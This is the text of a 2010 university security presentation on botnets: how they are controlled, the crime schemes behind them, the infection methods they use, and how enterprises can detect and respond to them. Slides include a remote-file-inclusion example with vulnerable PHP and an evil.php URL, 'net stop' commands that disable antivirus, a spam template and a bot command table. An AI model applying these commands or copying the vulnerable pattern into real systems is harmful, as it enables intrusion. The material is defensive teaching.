Botnets and the Army of Darkness

A Presentation
For

IDC
2010

Craig A Schiller, CISSP-ISSMP, ISSAP

Portland State University
CISO
craigs@pdx.edu

Copyright Craig Schiller, 2010. This work is the intellectual property of the author.
Permission is granted for this material to be shared for non-commercial, educational
purposes, provided that this copyright statement appears on the reproduced
materials and notice is given that the copying is by permission of the author. To
disseminate otherwise or to republish requires written permission from the author.

12/08/21 © 2009 Craig A Schiller AOD - 1

Presentation materials from

12/08/21 ©
© 2008
2009 Craig
Craig A
A Schiller
Schiller AOD - 2
Handbook Against the AOD

12/08/21 ©
© 2008
2009 Craig
Craig A
A Schiller
Schiller AOD - 3
Agenda

•Botnet Overview
•Botnet Schemes
•How Do They Get In?
•What Can We Do?
•Concluding Thoughts

12/08/21 © 2009 Craig A Schiller AOD - 4

Why are We Here?

12/08/21 © 2009 Craig A Schiller AOD - 5

Strategy Against Botnets
“Cut off the head of the snake and the body will follow”

Unless of course, your snake is a Hydra

12/08/21 © 2009 Craig A Schiller AOD - 6
How Do Botherders Protect the C&C

• Multi-homed DNS
– FQDN maps to 3 or more IP addresses
botnet1.example.com pointing to 127.0.0.1
botnet1.example.com pointing to 127.0.0.2
botnet1.example.com pointing to 127.0.0.3
botnet1.example.com pointing to 127.0.0.4
botnet1.example.com pointing to 127.0.0.5
botnet1.example.com pointing to 127.0.0.6
– Dynamic DNS used thru commercial site
– Change IP addresses quickly
• Short DNS TTLs for clients
– Remap DNS often, check at boot
• FastFlux DNS
– Change IP addresses and/or DNS names quickly
(for spam < 5 minutes) and often
12/08/21 © 2009 Craig A Schiller AOD - 7
Hiding the C&C Server or Phishing Website

The above animation demonstrates a persistent phishing cluster detected and analyzed by InternetPerils using server addresses from 20 dumps of the APWG repository, the
earliest shown 17 May and the latest 20 September. This phishing cluster continues to persist after the dates depicted, and InternetPerils continues to track it.

12/08/21 © 2009 Craig A Schiller AOD - 8

Why are We Here?

Microsoft Senior Security Manager says Botnets are the biggest threat of 2007
Vincent Cerf, founder of the Internet, tells global finance conference that 1/4th of
all computers belong to botnets.
Norman Elton and Matt Keel from the College of William & Mary, in a 2005
presentation, called bot networks “the single greatest threat facing humanity.”
John Macanan, in “The Evolution of Malicious IRC Bots,” says that Botnets are
“the most dangerous and widespread Win32 viral threat.

Microsoft reports that of the 5.7 million unique Windows systems from which
the MSRT removed malware, 62% were found to have a Trojan or bot client.

Ryan Narraine, a writer for e-week, said that botnets are “the key hub for well
organized crime rings around the globe, using stolen bandwidth from drone
zombies to make money from nefarious Internet activity.”

12/08/21 © 2009 Craig A Schiller AOD - 9

Viruses, Worms, Trojans, and Botnets

Virus – Autonomous, malicious code, infects boot sector or files but

cannot spread itself to another computer. Spreads manually via
floppy disks, later by email or web download.
Worm – Autonomous, malicious code, spreads across the network
via email, via network vulnerabilities
Trojan – Malicious code that poses as legitimate code to get the
user to execute it.
Remote Access Trojan – Malicious code which poses as legitimate
code to gain access, then permits the operator to gain remote control
of the victim’s computer
BotClients/Zombies – Malicious code which permits a victim’s
computer to be controlled by an agent. The agent makes is easy for
the operator (called a bot herder) to manage and operate Tens and
Hundreds of Thousands of clients
Army of Darkness – Collectively all of the zombies controlled by
botherders
12/08/21 © 2009 Craig A Schiller AOD - 10
What makes a Bot a Bot?

C&C
Traditional Botnet

IRC protocol

Bot Bot Bot Bot

…
100 to 100000 botnet clients
In the original use of the term “Bot”, the bot client contained malicious code
that would retrieve and execute commands that were sent by the botherder.
12/08/21 © 2009 Craig A Schiller AOD - 11
What makes a Bot a Bot?-2

C&C

Terminal Services
IRC protocol
VNC
Bot Bot
RDP
Carbon copy
Remote BackOrifice
controlled SubSeven
clients

Now, many include the systems that execute commands of the botherder even if the
malicious code is not present. These systems are remotely controlled. They would
be considered bot clients if they were part of a “net” of remotely controlled clients,
even if the “bot” mechanism is somewhere else.
12/08/21 © 2009 Craig A Schiller AOD - 12
Command & Control Today

Google cloud platform used for botnet control

Twitter-based Botnet Command Channel
HTTP pull-based Command & Control
P2P Command &Control
Random name Fast-flux DNS

12/08/21 © 2009 Craig A Schiller AOD - 13

Botnet Commands
Command What it does Command What it does
bot.command Runs a command with system() mac.logout Logs the user out
bot.flushdns Flushes the bot’s DNS cache ftp.update ftps and executes a file
bot.quit Quits the bot ftp.execute ftps and Updates the bot
bot.longuptime If uptime is more than 7 days, ftp.download Downloads a file from FTP
bot will respond http.visit Visits URL with specific referrer
bot.sysinfo Displays the system info http.update Executes a file from HTTP URL
bot.status Gives status http.execute Updates the bot from HTTP
bot.rndnick generate a new random nick http.download Downloads a file from HTTP
bot.remove Removes the bot rsl.logoff Logs the user off
bot.open Opens a file rsl.shutdown Shuts the computer down
bot.nick Changes the bot’s nickname rsl.reboot Reboots the computer
bot.id Displays the current code ID pctrl.kill Kills a process
shell.disable Disable shell handler pctrl.list Lists all processes
shell.enable Enable shell handler ddos.httpflood Starts an HTTP flood
shell.handler Fallback handler for shell Redirect.stop Stops all redirects running
commands.list Lists all available commands redirect.https Starts an HTTP Secure proxy
plugin.unload Unloads a plug-in (not redirect.http Starts an HTTP proxy
supported yet) harvest.aol Makes the bot get AOL data
plugin.load Loads a plug-in harvest.emailshttp Get a list of e-mails via HTTP
inst.svcdel Deletes a service harvest.emails Get a list of e-mails
inst.svcadd Adds a service
mac.login Logs the user in Source: Joe Stewart, SecureWorks
12/08/21 © 2009 Craig A Schiller AOD - 14
Evolution of Bot Technology
Evolution of Bot Technology Timeline
A timeline showing the introduction of Bots and Bot Technology Saturday, March 03, 2007

2003
2002 SpyBot
SDBot, written in C++ Spyware capabilities
Source code Available (keylogging,
to hacker community data mining for email addresses 2004
Small, single binary Lists of URLs,etc) PolyBot
1988 1999
Pretty Park discovered A derivative of AgoBot with
Invention of IRC Polymorphic abilty. Changes it’s the
first worm to use an IRC server
as a means of remote control look of its code on every infection

1989 1990 1991 1992 1993 1994 1995 1996 1997 1998 1999 2000 2001 2002 2003 2004 2005 2006

1988 2006

2005
1989 MYTOB
Greg Lindahl invents GM the first Bot, My Doom
GM plays “Hunt the Wumpus” with IRC users 1999 mass emailing worm
SubSeven trojan/bot 2002 with Bot IRC C&C
A remote control trojan 2003
AgoBot, Gaobot
added control via IRC Introduces modular design RBot
2000 Most Prevalent Bot today
GT Bot, mIRC based 1st module breaks-in
Spreads through
Runs scripts in response to downloads 2nd module weak passwords,
IRC server events 2nd module turns off anti-virus easilty modifieable,
Supports raw TCP and UDP Hides from detection,
downloads 3rd module Uses packaging software
Socket connections
Module 3 has attack
engines/payload Page 1

12/08/21 © 2009 Craig A Schiller AOD - 15

Why Do They Do It?
$

"Why should I take a regular job after graduating and

exert myself to earn just $2,000 a month, rather than
grab this chance to make money? It makes sense to get
as much as you can, as quickly as possible, rather than
wasting time working for someone else."
Russian hacker on a cyber-crime
credit card fraud forum

$$
.

12/08/21 © 2009 Craig A Schiller AOD - 16

RBN Operations
Services: Some external services are used by
RBN and affiliates. Those services can be MX
relay or NS hosting.
RBN: This is the core business of RBN. It is
used to offer Hosting for cybercrime. Inside this
part, we can identify the direct subsidiaries
from RBN : Nevacon and Akimon.
Hosting: This is the part used to host most of
RBN public websites, to register RBN domain
names… Hosting and registration is a really
strong partner for RBN. Incidentally, it could be
possible that those two blocks are under the
same company.
Telecom: This is the entity which aims at
providing the Internet access. It seems that
SBTel has obtained from Silvernet to access
Saint Petersburg Internet Exchange Point
(SPBIX).

11/21/07
Ref: Bizeul.org -

12/08/21 © 2009 Craig A Schiller AOD - 17

RBN Operations
SILVERNET
CREDOLINK

RBN

OINVEST
SPB IX

DELTASYS
INFOBOX
DATAPOINT

11/21/07 Ref: Bizeul.org -

12/08/21 © 2009 Craig A Schiller AOD - 18
RBN USA Dead?

It is pleasing to report the last remaining peer routing Atrivo

(AS 27595 Atrivo/ Intercage), ‘Pacific Internet Exchange’ (PIE)
see Spamhaus ref below, was withdrawn at 2:35am EST
Sunday Sept 21st 2008.

12/08/21 © 2009 Craig A Schiller AOD - 19

McColo

It is pleasing to report the last remaining peer routing Atrivo

(AS 27595 Atrivo/ Intercage), ‘Pacific Internet Exchange’ (PIE)
see Spamhaus ref below, was withdrawn at 2:35am EST
Sunday Sept 21st 2008.

12/08/21 © 2009 Craig A Schiller AOD - 20

Effect of De-peering
50% Drop in Spam

12/08/21 © 2009 Craig A Schiller AOD - 21

The Challenge

"If we do not, on a national scale, attack

organized criminals with weapons and
techniques as effective as their own,
they will destroy us."

Robert F. Kennedy, 1960

12/08/21 © 2009 Craig A Schiller AOD - 22

Botnet animation

12/08/21 © 2009 Craig A Schiller AOD - 23

Botnets Life Cycle
Computer is
Exploited
Becomes a Bot

New Bot Rallys to

let Botherder
know it’s joined
the team

Retrieve the Anti

A/V module Modular
Secure the New
Bot Client

Retrieve the
Payload module Adaptive

Report Result to
the C&C Channel
Listen to the C&C
Server/Peer for Targetable
commands

Execute the
commands

On Command,
Erase all evidence
and abandon the
client
12/08/21 © 2009 Craig A Schiller AOD - 24
Botnet Client communication

12/08/21 © 2009 Craig A Schiller AOD - 25

Top Ten Most Dangerous Bots
July 2009

No. 1: Zeus aka Z-bot; Financial Trojan, keystroke logger, MITB 3.6M
No. 2: Koobface Social engineering, trojaned codec, Bot client 2.9M
No. 3: TidServ Trojaned spam attachment rootkit see #4 1.5M
No. 4: Trojan.Fakeavalert Social engineering delivery vehicle 1.4M
No. 5: TR/Dldr.Agent.JKH Remote Control Trojan sends encrypted
data to C&C. Clikbot 1.2 M
No. 6: Monkif Middleware attempts to downloadadware BHO .5M
No. 7: Hamweq aka IRC Brute or an autorun worm, downloader .48M
No. 8: Swizzor – Trojan dropper Installs adware .37M
No. 9: Gammima aka , Gamania, Frethog, Vaklik and Krap, steals online
game account info, rootkit, spreads on USB .23M
No. 10: Conficker aka Downadup Propgates 4 ways .21M
12/08/21 © 2009 Craig A Schiller AOD - 26
2009 Top 10 Malware Families

Koobface
Zeus
Tidserv
Monkif
Conficker
Vundo
Swizzor
Hamweq
Sinowal
Matcash

12/08/21 © 2009 Craig A Schiller AOD - 27

Additions

Torpig/Mebroot Financial bot, Boot sector virus –re-imaged machines

still infected
Bredolab A downloader now connected with Zeus and FakeAV

Mariposa harvest financial information, selling parts of the botnet,

installing pay-per-install toolbars, selling stolen credentials
for online services, and using the stolen banking credentials
and credit cards to make transactions to overseas mules,
possible hijacking of Google AdSense advertisement revenue

3 Arrested 12.7M

12/08/21 © 2009 Craig A Schiller AOD - 28

Man in the Browser Attack - torpig

12/08/21 © 2009 Craig A Schiller AOD - 29

Spam

As of 3/9/2010 Baracuda reports that 88.74% of all email processed

by their spam appliances worldwide was spam.

1,497,376,877 spam emails out of 1,687,380,806 total emails

(http://www.barracudacentral.org/index.cgi?p=spam)

12/08/21 © 2009 Craig A Schiller AOD - 30

Botnets and Spam

12/08/21 © 2009 Craig A Schiller AOD - 31

Spam Template
Received: from 192.168.0.%RND_DIGIT
(203-219-%DIGSTAT2-%STATDIG.%RND_FROM_DOMAIN [203.219.%DIGSTAT2.%STATDIG])
by mail%SINGSTAT.%RND_FROM_DOMAIN (envelope-from %FROM_EMAIL)
(8.13.6/8.13.6) with SMTP id %STATWORD for <%TO_EMAIL>; %CURRENT_DATE_TIME
Message-Id: <%RND_DIGIT[10].%STATWORD@mail%SINGSTAT.%RND_FROM_DOMAIN>
From: "%FROM_NAME" <@%FROM_EMAIL>
X-Spam-Flag: YES
X-Scanned-By: milter-spamc/0.25.321 (localhost [0.0.0.0]); Thu, 01 Mar 2007
09:14:01 -0600
X-Scanned-By: milter-spamc/0.25.321 (miconsulting.com [66.34.157.130]);
Thu, 01 Mar 2007 09:14:01 -0600
X-Spam-Status: YES, hits=8.60 required=5.00
X-Spam-Level: xxxxxxxx
Subject: [SPAM]
Status: RO

%TO_CC_DEFAULT_HANDLER
Subject: %SUBJECT
Sender: "%FROM_NAME" <%FROM_EMAIL>
Mime-Version: 1.0
Content-Type: text/html
Date: %CURRENT_DATE_TIME

%MESSAGE_BODY
12/08/21 © 2009 Craig A Schiller AOD - 32
Pump & Dump Stocks
Making Dollars and Sense Now is The Time!

SymboL: PSCP
Current Price: $0.35
5 Day Target price: 1.75
Action: Aggresive Buy

Underbanked consumers are an opportunity investors can't afford

to miss, especially as new research reveals a closer look at the
breadth and potential of the market. According to a new study by
BearingPoint and Visa, approximately 84 million people are un-
and underbanked, representing $1.1 trillion in income. Assuming
these consumers spend 1% of their income to pay for financial
services, that amounts to $11 billion. And that is at 1%! Not bad
work if you can get it.
http://www.crummy.com/features/StockSpam/
12/08/21 © 2009 Craig A Schiller AOD - 33
How Much Do They Make
• Blue Security, a security company that took on
Spammers agressively, underwent a Distributed Denial of
Service (DDoS) attack from zombie computers under control
of a Russian speaking spammer.
• This spammer (or spam gang), which we called
PharmaMaster, claimed to make $3M dollars a month off of
spam.
• Unwilling to give up that income, he paid a hacker $2,000
an hour to perform the DDoS against Blue Security.
• It cost him over $1M dollars by the time all was said and
done
• It exhausted the funding of Blue Security and they were
forced to close shop.

12/08/21 © 2009 Craig A Schiller AOD - 34

Botnets and Movie Theft
Release Group
hires/uses botnet for
storage and
distribution

15% of Losses attributed

to College Students

12/08/21 © 2009 Craig A Schiller AOD - 35

Botnets and Clicks-4-Hire

12/08/21 © 2009 Craig A Schiller AOD - 36

Botnets and Clicks-4-Hire
Bot-driven fraud has become such a big
business that Google was recently sued by
class-action plaintiffs who claimed that bots,
not people, had clicked on their ads. The ads
were priced based on how many clicks they
received; apparently competitors had hired
bots to jack up the rate with an avalanche of
extra clicks.

Charged with negligence for failing to guard

against such abuses, Google settled for $90
million. “Attack of the Bots ”, by Scott Berinato
Wired 14.11 Nov 2006
12/08/21 © 2009 Craig A Schiller AOD - 37
Extortion
• We’ve encrypted your files.
•Pay me for the key to decrypt them.
• We’re DDoSing your website.
•Pay me to stop.
•Pay me not to start.

In 2004, botnets attacked dozens of online gambling

sites. The bookmakers were told to pay between $10,000
and $50,000 to get their sites back online. (Wired, Nov
2006)

But, of course, “Once you have paid him the Dane-geld, you never get rid of the Dane.”
Dane-geld, by Rudyard Kipling (A.D. 980-1016 )

12/08/21 © 2009 Craig A Schiller AOD - 38

Theft – Identity and other

• Keystroke logging attacks

• Harvesting credit cards, SSAN, keys,
passwords

[11:23] *** :newyork.ny.us.somewhere.org 322 Justlooking

#cards 73 : Welcome. WGeTz sell fulls, msg HIM. NEW ->
(Link: www.kentmintek.com/coolindex.html)
www.kentmintek.com/coolindex.html .
WGeTz needs ITALY WU DROP.

12/08/21 © 2009 Craig A Schiller AOD - 39

Theft – Identity and other

• Phishing attacks
• Pharming attacks

12/08/21 © 2009 Craig A Schiller AOD - 40

Phishing Overview
Botnet Client
Hosts phishing
website

Botnet Client
Sends spam
12/08/21 © 2009 Craig A Schiller AOD - 41
How do they get in?

1. Guessing weak passwords/phishing attacks

2. Exploiting Network vulnerabilities
3. Using Social Engineering
4. Using web-based Trojans
• Trojan websites – Game cheats
• Trojan websites - Pornography
5. Using Email-based Trojans
• Phishing & Pharming
• Trojan downloads
6. Using IM-based Trojans (Social engineering)
7. Rogue dhcp server serving malicious DNS server
12/08/21 © 2009 Craig A Schiller AOD - 42
Money Mule
Fraudsters contact prospective victims
“I am Mr. Richard H. Mason President/CEO MM Group Handling.

We are a trading company that is into the hire, sales and service of Electrical
Trucks, Fork Trucks and associated materials handling equipments and diverse
range of battery for electric vehicles which can be readily adapted for customers
specific requirements to the America and selected locations in Europe.

We are searching for individuals or a company who can act as our

representative/payment agent in your country and earn 10% of every payment
made through you to us.”
2. The crime rings persuade the victim to come and work for their fake
company.
3. Money mules receive funds into their accounts.
These funds are stolen from other accounts that have been compromised.
4. Mules then are asked to take these funds out of their accounts and
forward them overseas (minus a commission payment), typically using a
wire transfer service.
Source: Bank Safe Online
12/08/21 © 2009 Craig A Schiller AOD - 43
Botnets for Sale

Botnet Ad on an IRC channel

[11:07] *** :newyork.ny.us.someplace.org 322 Justlooking
#Bot-Services 6 :(Lew|s-) Welcome. My BotNet is ready to
be used. You would like to profit from it? Leave a msg on
the channel, one @ will respond to you soon. Thank you!

“There may be millions of such PCs around the world

doing the bidding of crime gangs, experts say, and
they can be rented for as little as $100-per-hour.”
Home PCs rented out in sabotage-for-hire racket
By Bernhard Warner, Reuters
“Fluid third-party exchange market (millions)
•Going rate for Spam proxying 3 -10 cents/host/week
•Seems small, but 25k botnet gets you $40k-130k/yr
Raw bots, .01$+/host, Special orders ($50+)”
Geoffrey M Voelker, UC San Diego
12/08/21 © 2009 Craig A Schiller AOD - 44
How do they get into webservers?

<?php include($vuln); ?>

1. Get /a.php?vuln=http://webhost.com/evil.php

4. The Output from evil.php is sent to Attacker

Target.com
Attacker

3. Malware PHP file ‘evil.php’ is sent to Target.com

And is executed by the include() function.

2. Target makes request to wehost.com/evil.php

Webhost.com

12/08/21 © 2009 Craig A Schiller AOD - 45

Top 5 Reasons Why I think I’m Safe

1. There’s nothing important on my

computer
2. My A/V program said I didn’t have a virus
3. I checked and I didn’t see anything
4. My Corporate firewall will protect me
5. I have a Mac/Unix computer. They don’t
get viruses

12/08/21 © 2009 Craig A Schiller AOD - 46

I have a Mac/Unix computer.
I checked and I didn’t see anything
#1 platform for Command & Control Servers –
Unix

Mac Trojan aimed at taking money from Mac Users

The Trojan comes disguised as a video-decoding plug-in that users are told
they must install to watch free porn clips. Instead, the software burrows into
the operating system and diverts some of the victim's future web surfing to
sites under the attacker's control. It's the professional attack on Macs that the
security community has long predicted, according to Dave Marcus, security
research manager at McAfee's Avert Lab, who said it was "written by people
who know how to write malware."

http://www.wired.com/politics/security/news/2007/11/mac_trojan

12/08/21 © 2009 Craig A Schiller AOD - 47

Firewall will protect me
I checked and I didn’t see anything

Firewalls are designed to let traffic in

12/08/21 © 2009 Craig A Schiller AOD - 48

I checked and I didn’t see anything

I checked and I didn’t see anything

Hidden32.exe permits applications to run without using their GUI

HideUserv2.exe adds an invisible user to the administrator group
User Mode rootkits
Kernel mode rootkits
12/08/21 © 2009 Craig A Schiller AOD - 49
I checked and I didn’t see anything

I checked and I didn’t see anything

12/08/21 © 2009 Craig A Schiller AOD - 50

A/V Program Said No Virus
I checked and I didn’t see anything
net start >>starts
net stop "Symantec antivirus client"
net stop "Symantec AntiVirus"
net stop "Trend NT Realtime Service"
net stop "Symantec AntiVirus"
net stop "Norton antivirus client"
net stop "Norton antivirus"
net stop "etrust antivirus"

Best Bot left the A/V tray icon and a fake GUI

12/08/21 © 2009 Craig A Schiller AOD - 51

A/V Program Said No Virus
I checked and I didn’t see anything

12/08/21 © 2009 Craig A Schiller AOD - 52

Nothing Important
Your space, network, & processing power
I checked and I didn’t
• Child Pornographysee anything
• Bestiality
• Stolen movies, games, & software
Your access
• Student records
• SSAN
• University resources
• Your email
Your money
Your identity

12/08/21 © 2009 Craig A Schiller AOD - 53

Nothing Important
I checked and I didn’t see anything

12/08/21 © 2009 Craig A Schiller AOD - 54

Protect Your Enterprise
1. Ensure that all enterprise and local accounts have strong passwords. Configure
Domain security policy to enforce this and auto-lockout
2. Eliminate all generic accounts. Where possible make all non-user accounts services.

3. Eliminate or encapsulate all unencrypted authentication

4. Establish a perimeter and segregate valuable or dangerous network segments.
Make FW rules accountable and require change control
5. Establish standards for web app and other development to eliminate avoidable
coding vulnerabilities (e.g. use of mod-sec for apache websites)
6. Staff your anti-spam, anti-virus, abuse, proxy cache, and web filter processing efforts
7. Install and operate IDS/IPS systems (like ourmon, snort, etc)
8. Google your own site - site:mysite.com viagra
9. Actively scan your site for vulnerabilities
10. Centralize and process logs, including workstation security and firewall logs.
11. Mine your anti-virus quarantines, abuse notifications, infected systems for
intelligence about botnet infections.
12. Participate or join quasi-intelligence organizations and use their data in your
detection tools. Report new info. Phishing attacks to www.castlecops.com/PIRT.
Botnet clients/C&C to isotf.org.
12/08/21 © 2009 Craig A Schiller AOD - 55
 How Do We Detect Them?

Bot Detection is mostly behavioral

I checkedA/V,
and I didn’t
Anti-Spam, see anything
Anti-Spyware
Host based
Security logs
RUBotted – Trend Micro
Enterprise Reporting
User Help Desk Tickets
Abuse notifications
Quasi-Intelligence Organizations
Monitoring & Analysis
Ourmon
Firewall & Router logs
IDS/IPS – Host and Network
Darknets, Honeypots
DNS
Server & Workstation Log analysis
Malware analysis (Sandbox)
12/08/21
Forensics © 2009 Craig A Schiller AOD - 56
Responding to Detection
Internet

Botnet Sensors
Botnet Sensors

Security Researcher
Wormwatch mailing list

131.252.x.x NERO says bad

131.252.x.x Acting Bad

131.252.x.x talking to bad

McAfee 38.100.x.x McAfee says bad
Server

Network Team User Support Server Support

TAGs
Create Tracking Ticket Identify computer or user Identify ServIer or webpage owner Locate infected system
Block Network access Retrieve computer Identify compromised account Identify system owner
Identify location
User Reports
Backup all files Locate malware Re-image computer
Identify computer or user Perform quick forensics Determine attack vector

Re-image computer

Security Team
Identify computer or user

Review quick forensics

Perform deep forensics

Ensure appropriate resources are working the incident

12/08/21 © 2009 Craig A Schiller
Identify useful intelligence markers
AOD - 57
Quasi-Intelligence Organizations

REN-ISAC Mailing lists

• Botnet
Shadowserver • http://www.whitestar.linuxbox.org/mailman/listinfo/botnets

Nanog • Phishing
• http://
Castlecops.com www.whitestar.linuxbox.org/mailman/listinfo/phishing

• Vendor
MIRT
PIRT ISC Storm Center
APWG

http://www.bleedingthreats.net/fwrules/

12/08/21 © 2009 Craig A Schiller AOD - 58

Malware Domain List

12/08/21 © 2009 Craig A Schiller AOD - 59

Hosts-file.net

12/08/21 © 2009 Craig A Schiller AOD - 60

Educause Recommendations
1. Make certain that systems used in performing financial transactions
are protected by strict technical controls and receive periodic validation.
2. Make certain that personnel involved in performing online financial
transactions have the necessary security awareness and training. Those
persons should receive targeted training on phishing and this threat.
3. Have written policies defining the controlled environment in which
online banking transactions can be conducted, e.g. what systems can be
used, how they must be maintained, required personnel training, etc.
4. Routinely audit compliance with established technical controls and
policies.
5. WE STRONGLY RECOMMEND THAT all online banking operations
should be conducted on special-use computers that are used SOLELY
for banking transactions. No other use of the machine should be
permitted - no e-mail, no web browsing, no general-purpose business
use - nothing but institutional online banking transactions.

12/08/21 © 2009 Craig A Schiller AOD - 61

More technical recommendations

-- Application white-listing, e.g. on Windows, AppLocker[1][2], can offer significant

protection.
-- Systems used for online banking:
+ Should have the least amount of software installed as
necessary to facilitate their business functions.
+ Should have Javascript and ActiveX disabled or specifically
limited to trusted sites.
+ Should be subject to a change management process for
any work that's to be done on the machine. Multiple-party
approvals should be required.
+ Should be examined monthly and routinely patched by
professional institutional IT security staff. If the system
is not examined or patched by a specific date of a month,
business office folks should not use it until the IT
security staff bring it up to date.
-- Two-factor authentication should be used for banking access were available. While two-
factor authentication will not protect against all attacks it does provide protection against
many. Sites should press their banks to offer two-factor if they don't already.

12/08/21 © 2009 Craig A Schiller AOD - 62

More technical recommendations

Separate machine(s) used SOLELY for institutional online banking operations (and used for
all such operations) is STRONGLY RECOMMENDED. Useful technical and policy controls
include:
Referencing the The Irretrievable Losses of Malware-Enabled ACH and Wire Fraud:
+ Don't make the machine part of a Windows domain. Administer
the machine using a local administrator account.
+ Shut the machine down when not in use.
+ Implement very aggressive firewall and possibly proxy
protections for the system. All non-banking traffic should
be denied.
+ Aggressively monitor traffic to and from the system
+ Place the machine on a separate VLAN, on a secure dedicated
hard-wired network connection.

12/08/21 © 2009 Craig A Schiller AOD - 63

More technical recommendations

+ No other use of the machine should be permitted - no e-mail,

no web browsing, no general-purpose business use - nothing but
online instructional banking transactions.
+ Physical access to the machine should be tightly controlled.
+ The system should have a permanent and obvious distinguishing
mark, e.g. spray paint it orange, to insure there can be no
mistaking that this is a special purpose machine.
+ Any other intentional use of the machine should be a cause
for disciplinary action.
-- While virtual machine solutions are technically an option to dedicated machines, in the
interest of keeping the solution simple, clean, usable, and understandable by non-technical
business office staff, we do not recommend virtual solutions.
-- And as always, "user privilege reduction" - the user should never conduct normal use of
the system under an admin-privileged account.
-- Other standard desktop hardening recommendations and practices apply, e.g. .

12/08/21 © 2009 Craig A Schiller AOD - 64

Closing Thoughts

Botherders are human adversaries, and can respond to detection

strategies.

David Dagon, 2007

12/08/21 © 2009 Craig A Schiller AOD - 65

Agenda

•Botnet Overview
•Botnet Schemes
•How Do They Get In?
•What Can We Do?
•Concluding Thoughts

12/08/21 © 2009 Craig A Schiller AOD - 66

Source of all evil

12/08/21 © 2009 Craig A Schiller AOD - 67

Q&A

Questions?

Craig A Schiller, CISSP-ISSMP, ISSAP

craigs@pdx.edu
Portland State University
CISO

12/08/21 © 2009 Craig A Schiller AOD - 68